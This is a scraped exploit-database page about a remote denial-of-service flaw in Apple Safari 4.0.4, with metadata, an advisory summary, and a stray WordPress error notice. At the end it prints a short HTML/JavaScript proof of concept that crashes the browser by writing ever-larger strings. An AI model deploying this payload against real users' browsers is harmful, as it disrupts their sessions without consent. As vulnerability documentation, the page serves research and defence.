Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Apple Safari Remote Denial-of-Service Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Safari
by:
Unknown
7.5
CVSS
HIGH
Remote Denial-of-Service
Unknown
CWE
Product Name: Safari
Affected Version From: Safari 4.0.4
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:apple:safari:4.0.4
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Apple Safari Remote Denial-of-Service Vulnerability

The vulnerability allows an attacker to crash the affected browser, resulting in a denial-of-service condition. Memory corruption or code execution might be possible, but it has not been confirmed.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38133/info

Apple Safari is prone to a remote denial-of-service vulnerability.

Successful exploits may allow an attacker to crash the affected browser, resulting in a denial-of-service condition. Given the nature of this issue, memory corruption or code execution might be possible, but has not been confirmed.

The issue affects Safari 4.0.4; other versions may also be affected. 

<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script>